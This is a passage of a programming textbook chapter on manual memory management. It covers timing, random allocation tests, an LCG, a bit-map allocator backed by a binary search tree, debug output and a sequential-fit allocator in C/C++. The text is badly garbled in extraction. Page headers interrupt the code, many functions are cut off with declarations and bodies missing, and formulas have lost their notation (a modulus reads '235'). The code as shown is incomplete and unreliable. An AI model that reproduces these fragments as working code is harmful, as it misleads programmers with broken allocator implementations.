clock_t ticks1,ticks2, dt;
unsigned long msec1,msec2;
time(&t1);
ticks1 = clock();
msec1 = GetTickCount();
time(&t2);
ticks2 = clock();
msec2 = GetTickCount();
dt = ticks2-ticks1;
printf("number of clock ticks = %lu\n",dt);
printf("ticks/second = %lu\n",CLOCKS_PER_SEC);
Manual Memory Management 215
return;
}
If this program is built and run, the following type of output will be
generated:
number of elapsed seconds = 31
number of clock ticks = 30980
ticks/second = 1000
number of elapsed seconds = 30
msecs=30960
void main()
{
unsigned int i,j;
Chapter 4
unsigned int nblocks;
unsigned int nbytes;
unsigned char* ptrs[1024];
nbytes=4096;
nblocks=1024;
for(i=0;i<nblocks;i++)
{
ptrs[i]=malloc(nbytes);
for(j=0;j<nbytes;j++)
{
char *cptr;
cptr = ptrs[i];
cptr[j] = 'a';
}
}
for(i=0;i<nblocks;i++)
{
free(ptrs[i]);
}
return;
}
216 Chapter 4
The previous program does not force a manager to deal with the
arbitrary requests that a heap manager normally encounters. This
kind of test is unrealistic.
On the other hand, a completely random series of allocations is
also not very realistic.
#include<stdlib.h>
void main()
{
unsigned int i,j;
unsigned int nblocks;
unsigned int nbytes;
unsigned char* ptrs[1024];
nblocks=1024;
for(i=0;i<nblocks;i++)
{
nbytes=rand();
ptrs[i]=malloc(nbytes);
for(j=0;j<nbytes;j++)
{
char *cptr;
cptr = ptrs[i];
cptr[j] = 'a';
}
}
for(i=0;i<nblocks;i++)
{
free(ptrs[i]);
}
return;
}
Chapter 4
1024 .02 = p7
4096 .02 = p8
Figure 4.4
}/*end getU*/
This code invokes the rand() function located in the C standard
library. The rand() function generates what is known as a pseudo-
random integer in the range 0 to RAND_MAX. A pseudorandom
number is one that is generated by a mathematical formula. A
well-known formula for creating random integer values is the Lin-
ear Congruential Generator (LCG), which makes use of a recursive
relationship:
xn+1 = (axn + b)mod m for n = 0, 1, 2, 3, …
For example, if we pick a=5, b=3, m=16, and x0=3, we will obtain
the following stream of values:
x0 = 3, x1 = 2, x2 = 13, x3 = 4, …
Manual Memory Management 219
The value x0 is known as the seed. One thing you should know about
LCGs is that they eventually begin to repeat themselves. In gen-
eral, the constants that are chosen (i.e., a, b, and m) make the
difference between a good and a bad LCG. According to Knuth, a
good LCG is:
( 3141592653xn + 2718281829 )mod 235 x0 = 0
NOTE The LCG technique for creating random numbers was discov-
ered by Dick Lehmer in 1949. Lehmer was a prominent figure in the
field of computational mathematics during the twentieth century. He
was involved with the construction of ENIAC, the first digital computer
in the United States, and was also the director of the National Bureau
of Standards’ Institute for Numerical Analysis.
Testing Methodology
Each memory manager that I implement will be subjected to two Chapter 4
tests: a diagnostic test and a performance test.
If you modify any of the source code that I provide, you may want
to run the diagnostic test to make sure that everything still operates
correctly. The goal of a diagnostic test is to examine the operation of
a component, so it will necessarily execute much more slowly than
a performance test. Once a memory manager has passed its diag-
nostic test, it can be barraged with a performance test.
Performance testing will be executed by an instantiation of the
PerformanceTest class. The class is used as follows:
double p[8] = {.15, .20, .35, .20, .02, .04, .02, .02};
unsigned long x[8] = {16,32,64,128,256,512,1024,4096};
PerformanceTest pt = PerformanceTest(&td);
printf("milli-seconds=%lu\n",pt.runTest());
The PerformanceTest class, mentioned in the previous code
snippet, has the following implementation:
/* --perform.cpp-- */
struct TestData
{
double *dptr; // probability array
unsigned long *lptr; // allocation sizes
unsigned long samplesize; // # malloc() calls
unsigned long length; // size of arrays
};
class PerformanceTest
{
public:
PerformanceTest(struct TestData *tdptr);
unsigned long runTest();
private:
unsigned long nAllocations; // # of malloc() calls to make
unsigned long arraySize; // size of P(x) and x arrays
double *p; // P(x) = probability for X=x
unsigned long *x; // X = # bytes allocated
double getU();
unsigned long getRandomVariate();
void getAllocArray(unsigned long *lptr);
};
}/*end constructor--------------------------------------------*/
double PerformanceTest::getU()
{
return(((double)rand())/((double)RAND_MAX));
}/*end getU---------------------------------------------------*/
Manual Memory Management 221
U = getU();
for(i=0,total=p[0];i<=arraySize-2;i++)
{
if(U<total){ return(x[i]); }
total = total + p[i+1];
}
return(x[arraySize-1]);
/*
the above is a cleaner/slower way of doing something like:
if(U < p[0]){return(x[0]);}
else if(U <(p[0]+p[1])){return(x[1]);}
else if(U <(p[0]+p[1]+p[2])){return(x[2]);}
else if(U <(p[0]+p[1]+p[2]+p[3])){return(x[3]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4])){return(x[4]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4]+p[5])){return(x[5]);}
else if(U <(p[0]+p[1]+p[2]+p[3]+p[4]+p[5]+p[6]))
{return(x[6]);}
else{ return(x[7]);}
Chapter 4
*/
}/*end getRandomVariate---------------------------------------*/
for(i=0;i<nAllocations;i++)
{
lptr[i]=getRandomVariate();
}
return;
}/*end getAllocationArray-------------------------------------*/
getAllocArray(allocs);
initMemMgr(1024*1024);
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
addr[i] = (char *)newMalloc(allocs[i]);
if(addr[i]==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr[i]);
exit(1);
}
}
for(i=0;i<nAllocations;i++)
{
newFree(addr[i]);
}
ticks2 = GetTickCount();
closeMemMgr();
Manual Memory Management 223
free(addr);
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
Depending on the source files that I #include, different versions
of newMalloc() and newFree() can be used. I can also replace
newMalloc()/newFree() with the native malloc()/free()
implementations to get a baseline measurement.
You may notice that I defer time measurement until the last pos-
sible moment. I don’t start measuring clock ticks until the instant
directly before the memory allocation calls start occurring. This is
because I don’t want to include the time that was spent loading the
application, constructing input values, and executing shutdown
code.
I will admit that my testing code is synthetic, but my crude
approach is motivated by a need to keep my discussion limited. You
could fill up several books with an explanation and analysis of more
sophisticated performance testing methods. Per my initial design
goal (keep it simple . . . stupid), I have opted for the path of least
resistance.
There are a number of industrial-strength benchmark suites that
Chapter 4
have been built to provide a more accurate picture of how well a
processor or application performs. For example, the TOP500
Supercomputer Sites portal (http://www.top500.org) uses
the LINPACK Benchmark to rank high-performance installations.
The LINPACK Benchmark tests the horsepower of a system by
asking it to solve a dense set of linear equations.
SPEC, the Standard Performance Evaluation Corporation, is a
nonprofit corporation registered in California that aims to “estab-
lish, maintain, and endorse a standardized set of relevant
benchmarks that can be applied to the newest generation of high-
performance computers” (quoted from SPEC’s bylaws; see
http://www.spec.org). SPEC basically sells a number of
benchmark suites that can be used to collect performance metrics.
For example, SPEC sells a CPU2000 V1.2 package that can be used
to benchmark processors. SPEC also sells a JVM98 suite to test the
performance of Java virtual machines. If you have $1,800 to spare,
you can purchase SPEC’s MAIL2000 mail server benchmark suite.
224 Chapter 4
Figure 4.5
The problem with this approach is that the bit map does not indicate
how much memory has been allocated for a given region. If you exe-
cute a command like
my_address = malloc(55);
free(my_address);
Manual Memory Management 225
the bit map will not know how much storage to free because a bit
map has no place to record how much storage was allocated. All a
bit map can do is tell you which regions of memory are free and
which are taken. When you allocate the 55 bytes above, a certain
number of bits in the bit map will be cleared. However, once this
happens, the bit map cannot tell who owns the region and how much
memory they control.
This means that we need to augment the bit map with another
data structure that will be able to record how much memory is
reserved for each allocation. I decided to use a binary search tree
(BST) to serve this purpose. These two data structures — the bit
map and the binary search tree — complement each other nicely.
The bit map is used during the allocation phase to locate a free
memory region, and the BST is used during the release phase to
determine how many bits in the bit map to reset.
Chapter 4
Figure 4.6
Implementation
The source code implementation of the bit map memory manager is
broken up into several files:
Table 4.2
File Use
driver.cpp contains main(), is the scene of the crime
mallocV1.cpp newMalloc(), newFree() wrappers
perform.cpp implements the PerformanceTest class
memmgr.cpp uses bitmap.cpp and tree.cpp to institute a policy
bitmap.cpp implements the bit map
tree.cpp implements the BST
tree.cpp
The BST implementation is fairly generic:
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
struct BiNode
{
unsigned long value; //linear address
unsigned long index; //index into bitmap [0,nbits-1]
unsigned long nreserved; //number of bits reserved
class BinarySearchTree
{
public:
struct BiNode *root_ptr;
Chapter 4
void insertNode(struct BiNode **link, unsigned long val);
void insertNode(struct BiNode **link, struct BiNode *ptr);
};
/*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
/*
given struct Binode **link
228 Chapter 4
}/*end insertNode---------------------------------------------*/
(*(*link)).value = (*ptr).value;
(*(*link)).index = (*ptr).index;
(*(*link)).nreserved = (*ptr).nreserved;
(*(*link)).left = NULL;
(*(*link)).right = NULL;
PRINT("insertNode(): inserting %d\n",(*ptr).value);
}
else if( (*ptr).value < (*(*link)).value)
{
PRINT("insertNode(): moving left\n",(*ptr).value);
insertNode(&((*(*link)).left),ptr);
}
Manual Memory Management 229
else
{
PRINT("insertNode(): moving right\n",(*ptr).value);
insertNode(&((*(*link)).right),ptr);
}
return;
}/*end insertNode---------------------------------------------*/
Chapter 4
{
return(findNode((*link).left,val));
}
}/*end findNode-----------------------------------------------*/
}/*end deleteSmallestNode-------------------------------------*/
230 Chapter 4
void BinarySearchTree::deleteNode
(
struct BiNode **link,
unsigned long val
)
{
if( (*link)==NULL )
{
PRINT("deleteNode(): %d does not exist\n",val);
return;
}
if((*(*link)).right==NULL)
{
(*link) = (*(*link)).left;
}
else if((*(*link)).left==NULL)
{
(*link) = (*(*link)).right;
}
else
{
temp = deleteSmallestNode(&((*(*link)).right));
Manual Memory Management 231
(*(*link)).value = (*temp).value;
}
}
return;
}/*end deleteNode---------------------------------------------*/
}/*end deleteAll----------------------------------------------*/
Chapter 4
{
int i;
if(link==NULL)
{
return;
}
printTree((*link).right,level+1);
for(i=0;i<level;i++){ printf("-");}
printf("(%d)\n",(*link).value);
printTree((*link).left,level+1);
return;
}/*end printTree----------------------------------------------*/
if(link==NULL){ return(-1); }
232 Chapter 4
u = getHeight((*link).left);
v = getHeight((*link).right);
}/*end getHeight----------------------------------------------*/
bitmap.cpp
The BitMap class is also fairly straightforward in its implementa-
tion and could be reused for something else:
/*
1 bitmap bit = 16-byte block of memory
1 bitmap byte (i.e., block) = 128-byte block of memory
*/
#define BYTES_PER_BITMAP_BIT 16
#define BYTES_PER_BITMAP_BYTE 128
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
class BitMap
{
private:
unsigned char *map;
unsigned long nbytes;
unsigned long nbits;
public:
BitMap(unsigned long nblocks);
~BitMap();
unsigned long getByteSize();
void setBits(int val,unsigned long nbits,unsigned long
index);
int getBit(unsigned long index);
long getBitRun(unsigned long size);
void printMap();
};
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
Manual Memory Management 233
for(i=0;i<nbytes;i++){ map[i]=0xFF; }
printf("BitMap::BitMap(): nbytes=%lu",nbytes);
printf(", nbits=%lu\n",nbits);
return;
}/*end constructor--------------------------------------------*/
BitMap::~BitMap()
{
printf("BitMap::~BitMap(): freeing map[%ld]\n",nbytes);
free(map);
return;
}/*end destructor---------------------------------------------*/
Chapter 4
unsigned long BitMap::getByteSize()
{
return(nbytes);
}/*end getByteSize()------------------------------------------*/
/*
set nbits to val(i.e., 0,1) starting at bit specified by index
*/
void BitMap::setBits
(
int val,
unsigned long nbits,
unsigned long index
)
{
unsigned long bit;
unsigned long i,j;
unsigned char mask;
234 Chapter 4
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(bit>=index)
{
if(bit==index+nbits){ return;}
if(val){ map[i]=map[i]|mask; }
else{ map[i]=map[i]&(~mask); }
}
bit++;
mask = mask*2;
}
}
return;
}/*setBits----------------------------------------------------*/
/*
returns that value of the specified bit (0-nbits-1)
or -1 if index is out of bounds
*/
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(bit==index)
{
if(map[i]&mask){ return(1); }
else{ return(0); }
}
bit++;
mask = mask*2;
}
}
return(-1);
Manual Memory Management 235
}/*getBit-----------------------------------------------------*/
/*
returns the index that marks the start of 'size' bits set to 1
or returns -1 if such a run was not found
*/
current_size=0;
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(map[i]&mask)
{
current_size++;
if(current_size==size){ return(bit-size+1); }
Chapter 4
}
else
{
current_size=0;
}
bit++;
mask = mask*2;
}
}
return(-1);
}/*getBitRun--------------------------------------------------*/
void BitMap::printMap()
{
unsigned long bit;
unsigned long i,j;
unsigned char mask;
bit=0;
for(i=0;i<nbytes;i++)
236 Chapter 4
{
mask = 1;
printf("byte[%u]=%x\n",i,map[i]);
for(j=0;j<8;j++)
{
if(map[i]&mask){ printf("1"); }
else{ printf("0"); }
bit++;
mask = mask*2;
}
printf("\n\n");
}
return;
}/*end printMap-----------------------------------------------*/
memmgr.cpp
This source file brings the two previous data structures together to
form an actual memory manager, known fittingly as the Memory-
Manager class.
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
class MemoryManager
{
private:
BinarySearchTree bst;
BitMap *bmap;
HANDLE handle; //handle to heap
unsigned char *mem; //actual memory to manage
unsigned long memLength; //size in bytes of memory
public:
MemoryManager(unsigned long totalbytes);
~MemoryManager();
void* allocate(unsigned long nbytes);
void release(void *ptr);
void printState();
};
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
Manual Memory Management 237
/*
sets the total amount of memory, no re-sizing in this case each
byte in the BitMap represents BYTES_BITMAP_BYTE bytes of memory
*/
MemoryManager::MemoryManager(unsigned long totalbytes)
{
//init 3 dynamic objects: bmap, bst, mem[]
bst.root_ptr=NULL;
memLength = (*bmap).getByteSize()*BYTES_PER_BITMAP_BYTE;
handle = GetProcessHeap();
if(handle==NULL)
{
printf("MemoryManager::MemoryManager(): invalid
handle\n");
return;
}
Chapter 4
if(mem==NULL)
{
printf("MemoryManager::MemoryManager():");
printf("could not alloc memory\n");
exit(1);
}
printf("MemoryManager::MemoryManager():");
printf("mallloc() mem[%lu]\n",memLength);
return;
}/*end constructor--------------------------------------------*/
MemoryManager::~MemoryManager()
{
//release resources for objects: bmap, bst, mem[]
delete(bmap);
bst.deleteAll(&(bst.root_ptr));
if(HeapFree(handle,HEAP_NO_SERIALIZE,mem)==0)
{
238 Chapter 4
printf("MemoryManager::~MemoryManager(): HeapFree()
failed\n");
return;
}
printf("MemoryManager::~MemoryManager():");
printf("free() mem[%lu]\n",memLength);
return;
}/*end destructor---------------------------------------------*/
run_bits = (nbytes/BYTES_PER_BITMAP_BIT)+1;
PRINT("MemoryManager::allocate(): run_bits=%lu\n",run_bits);
index = ((*bmap).getBitRun(run_bits));
if(index==-1){ return(NULL); }
(*bmap).setBits(0,run_bits,index);
bst.insertNode(&(bst.root_ptr),&node);
PRINT("MemoryManager::allocate(): address=%lu\n",&mem
[index*16]);
return((void*)&mem[index*16]);
}/*end allocate-----------------------------------------------*/
}/*end release------------------------------------------------*/
void MemoryManager::printState()
{
printf("-----------------------------------------------\n");
(*bmap).printMap();
Chapter 4
printf("-----------------------------------------------\n");
bst.printTree(bst.root_ptr,0);
printf("-----------------------------------------------\n");
return;
}/*end printState---------------------------------------------*/
mallocV1.cpp
This file supplies wrappers that allow the MemoryManager class
to be used under the guise of the newMalloc() and newFree()
functions so that existing applications will only have to be slightly
modified.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_MEM_MGR
//#define DEBUG_MALLOCV1
#include<tree.cpp>
#include<bitmap.cpp>
#include<memmgr.cpp>
/*
wrapper functions
*/
MemoryManager *mmptr;
void closeMemMgr()
{
delete(mmptr);
}
#ifdef DEBUG_MALLOCV1
(*mmptr).printState();
#endif
return(ptr);
}
#ifdef DEBUG_MALLOCV1
(*mmptr).printState();
#endif
return;
}
The DEBUG_XXX macros, defined at the top of this file insert, acti-
vate a set of debugging printf() statements in each file. For the
performance test run, I commented these macros out so that none
of the printf() statements made it into the build.
Manual Memory Management 241
perform.cpp
In addition to the PerformanceTest class described earlier, this
file also contains the definition of the PerformanceTest-
Driver() function that will be called from main().
void PerformanceTestDriver()
{
double p[8] = {.15, .20, .35, .20, .02, .04, .02, .02};
unsigned long x[8] = {16,32,64,128,256,512,1024,4096};
PerformanceTest pt = PerformanceTest(&td);
printf("msecs=%lu\n",pt.runTest());
return;
}/*end PerformanceTestDriver----------------------------------*/
driver.cpp
This file is where everything comes together. The main() function
contains a call to debugTest() and PerformanceTest-
Chapter 4
Driver(). For diagnostic builds, I activate the debug macros in
mallocV1.cpp and then comment out the Performance-
TestDriver()function call. For the build that tests performance,
I comment out the debug macros and the debugTest() function
invocation. The version of driver.cpp below is set up to build an
executable that runs a performance test.
#include<mallocV1.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr[10];
int i;
initMemMgr(270);
ptr[0] = newMalloc(8);
ptr[1] = newMalloc(12);
ptr[2] = newMalloc(33);
ptr[3] = newMalloc(1);
ptr[4] = newMalloc(122);
242 Chapter 4
ptr[5] = newMalloc(50);
for(i=0;i<6;i++){ newFree(ptr[i]); }
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in
//mallocVx.cpp
//debugTest();
}/*end main---------------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test was performed by executing the code in the
debugTest() function defined in the driver.cpp source file. I
keep things fairly simple, but at the same time, I take a good, hard
look at what is going on. If you decide to run a debug test, you will
want to make sure that the DEBUG_XXX macros in malloc-
V1.cpp are turned on. You will also want to comment out the
PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager. After every allocation and release, I print out the
contents of the bit map and the binary search tree. This provides a
state snapshot of the memory manager. Also, the bits in each bit
map byte read from left to right (which is to say that the lower order
bits are on the left-hand side):
BitMap::BitMap(): nbytes=3, nbits=24
MemoryManager::MemoryManager():mallloc() mem[384]
MemoryManager::allocate(): request 8 bytes
MemoryManager::allocate(): run_bits=1
MemoryManager::allocate(): found run of 1 bits at 0
Manual Memory Management 243
Chapter 4
-----------------------------------------------
MemoryManager::allocate(): request 33 bytes
MemoryManager::allocate(): run_bits=3
MemoryManager::allocate(): found run of 3 bits at 2
insertNode(): moving right
insertNode(): moving right
insertNode(): inserting 5373996
MemoryManager::allocate(): address=5373996
-----------------------------------------------
byte[0]=e0
00000111
byte[1]=ff
11111111
byte[2]=ff
11111111
-----------------------------------------------
--(5373996)
-(5373980)
(5373964)
-----------------------------------------------
MemoryManager::allocate(): request 1 bytes
MemoryManager::allocate(): run_bits=1
MemoryManager::allocate(): found run of 1 bits at 5
244 Chapter 4
-----------------------------------------------
byte[0]=0
00000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
-----(5374188)
----(5374060)
---(5374044)
--(5373996)
-(5373980)
(5373964)
-----------------------------------------------
MemoryManager::release(): address=5373964
deleteNode(): freeing 5373964
-----------------------------------------------
byte[0]=1
10000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
----(5374188)
---(5374060)
--(5374044)
Chapter 4
-(5373996)
(5373980)
-----------------------------------------------
MemoryManager::release(): address=5373980
deleteNode(): freeing 5373980
-----------------------------------------------
byte[0]=3
11000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
---(5374188)
--(5374060)
-(5374044)
(5373996)
-----------------------------------------------
MemoryManager::release(): address=5373996
deleteNode(): freeing 5373996
-----------------------------------------------
byte[0]=1f
11111000
246 Chapter 4
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
--(5374188)
-(5374060)
(5374044)
-----------------------------------------------
MemoryManager::release(): address=5374044
deleteNode(): freeing 5374044
-----------------------------------------------
byte[0]=3f
11111100
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
-(5374188)
(5374060)
-----------------------------------------------
MemoryManager::release(): address=5374060
deleteNode(): freeing 5374060
-----------------------------------------------
byte[0]=ff
11111111
byte[1]=3f
11111100
byte[2]=fc
00111111
-----------------------------------------------
(5374188)
-----------------------------------------------
MemoryManager::release(): address=5374188
deleteNode(): freeing 5374188
-----------------------------------------------
byte[0]=ff
11111111
byte[1]=ff
11111111
byte[2]=ff
11111111
-----------------------------------------------
-----------------------------------------------
BitMap::~BitMap(): freeing map[3]
MemoryManager::~MemoryManager():free() mem[384]
The performance test was nowhere near as extended with regard to
the output that it produced. This was primarily because all the
Manual Memory Management 247
Trade-Offs
Bit mapped memory managers have the benefit of providing a
straightforward way to organize memory that, depending on the
bit-to-memory ratio, can minimize internal fragmentation. Many
early operating systems used bit maps to help manage memory
because bit maps are fixed in size and thus can be placed outside of
the chaos of the kernel’s dynamic memory pools. For example, if
each bit in a bit map represents 16 bytes of memory, a 512KB bit
map will be needed to manage 64MB of memory. Although this
Chapter 4
doesn’t include the storage needed for the associated BST, you can
see that the overhead isn’t that bad.
On the other hand, finding a run of free bits in a bit map means
that you may have to traverse the entire set of bits to find what you
are looking for (assuming that you do find it). This mandatory
searching makes allocation very expensive in terms of execution
time.
If I had to improve this code, I would replace the binary search
tree with a tree data structure that is guaranteed to be well-bal-
anced. As you can see from the debug output, the binary tree that
was formed was worst-case unbalanced (and that’s an understate-
ment). This is more a function of the request stream than of
anything else.
I would also tackle the code in the BitMap class that traverses
the bit map data structure. Most of my BitMap member function
implementations are based on brute force iteration. There are some
circumstances where I could skip needless iteration by being a little
more skillful with implied starting points. For example, it is obvious
that the 18th bit will be in the third byte of the bit map, so there is
no need to cycle through the first two bytes of the map.
248 Chapter 4
void main()
{
void *ptr[5];
int i;
for(i=0;i<5;i++)
{
ptr[i]=malloc(32);
printf("%p\n",ptr[i]);
}
for(i=0;i<5;i++)
{
free(ptr[i]);
}
return;
}
I compiled this using the following command line: C:\dos> tcc
-mh dmalloc.c.
I specified a “huge” memory model (via the -mh option) so that
addresses would be specified in the segment:offset real mode
format.
This program produced the following output while running on
DOS:
193B:0004 ( physical address 193B4 )
193E:0004 ( physical address 193E4 )
1941:0004 ( physical address 19414 )
1944:0004 ( physical address 19444 )
1947:0004 ( physical address 19474 )
As you can see, the libraries give each allocation its own 48-bit
block. It is more than likely that the extra 16 bytes is used by the
Manual Memory Management 249
Theory
The sequential fit technique organizes memory into a linear linked
list of free and reserved regions (see Figure 4.7). When an allocation
request occurs, the memory manager moves sequentially through
the list until it finds a free block of memory that can service/fit the
request (hence the name “sequential fit”).
Figure 4.7
Chapter 4
managed can index itself. Logically, the blocks of memory are
arranged as in Figure 4.7. However, the actual organization of each
block, be it free or reserved, in my implementation is specified by
Figure 4.8.
Figure 4.8
250 Chapter 4
Figure 4.9
Figure 4.10
Figure 4.11
Implementation
Because storage space in the heap is used to help organize heap
memory, the sequential fit memory manager implementation is not
Chapter 4
as prolific as the bit map-based manager. My implementation
requires only four files:
Table 4.3
File Use
driver.cpp contains main(), is the scene of the crime
mallocV2.cpp newMalloc(), newFree() wrappers (2nd version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the SequentialFitMemoryManager class
memmgr.cpp
The majority of the real work is performed by the class defined in
this file. The SequentialFitMemoryManager class takes care
of allocating heap storage from Windows and managing it. Both the
allocation and release functions have secondary private helper rou-
tines. The allocation function uses a helper function to split free
blocks. The release function calls a helper function to perform the
actual merging of free memory blocks.
252 Chapter 4
#ifdef DEBUG_SF_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0 3||4 7|| 8 ||9 12||13 .. n|
[PREV][NEXT][STATE][SIZE][payload]
U4 U4 U1 U4 ?
#define FREE 0
#define OCCUPIED 1
char *stateStr[3]={"FREE","OCCUPIED"};
class SequentialFitMemoryManager
{
private:
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size;
public:
SequentialFitMemoryManager(U4 nbytes);
~SequentialFitMemoryManager();
Manual Memory Management 253
void*allocate(U4 nbytes);
void release(void* addr);
void printState();
};
SequentialFitMemoryManager::SequentialFitMemoryManager(U4
nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("SequentialFitMemoryManager::");
printf("SequentialFitMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
Chapter 4
printf("SequentialFitMemoryManager::");
printf("SequentialFitMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
STATE(START)=FREE;
SIZE(START)=size-SZ_HEADER;
MSG0("SequentialFitMemoryManager::");
MSG1("SequentialFitMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
SequentialFitMemoryManager::~SequentialFitMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("SequentialFitMemoryManager::");
254 Chapter 4
printf("~SequentialFitMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("SequentialFitMemoryManager::");
MSG0("~SequentialFitMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
MSG0("SequentialFitMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("SequentialFitMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
Manual Memory Management 255
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
if(SIZE(addr)>= nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
Chapter 4
U4 newaddr;
MSG0("SequentialFitMemoryManager::");
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
STATE(addr)=OCCUPIED;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
STATE(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
256 Chapter 4
MSG0("SequentialFitMemoryManager::");
MSG0("split(): split=NO\n");
STATE(addr)=OCCUPIED;
}
return;
}/*end split--------------------------------------------------*/
if(addr==NULL)
{
MSG0("SequentialFitMemoryManager::");
MSG0("release(): cannot release NULL pointer\n");
return;
}
MSG0("SequentialFitMemoryManager::");
MSG1("release(%lu)\n",addr);
MSG0("SequentialFitMemoryManager::");
MSG1("address resolves to index %lu\n",free);
if(free<13)
{
MSG0("SequentialFitMemoryManager::");
MSG0("release(): address in first 13 bytes\n");
return;
}
merge(PREV(free),free,NEXT(free));
return;
}/*end release------------------------------------------------*/
/*
4 cases ( F=free O=occupied )
FOF -> [F]
OOF -> O[F]
FOO -> [F]O
OOO -> OFO
*/
Chapter 4
first handle special cases of region at end(s)
prev=0 low end
next=0 high end
prev=0 and next=0 only 1 list element
*/
if(prev==0)
{
if(next==0)
{
STATE(current)=FREE;
}
else if(STATE(next)==OCCUPIED)
{
STATE(current)=FREE;
}
else if(STATE(next)==FREE)
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to NEXT\n");
258 Chapter 4
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
PREV(temp)=current;
}
}
else if(next==0)
{
if(STATE(prev)==OCCUPIED)
{
STATE(current)=FREE;
}
else if(STATE(prev)==FREE)
{
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==FREE)&&(STATE(next)==OCCUPIED))
{
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==FREE))
Manual Memory Management 259
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
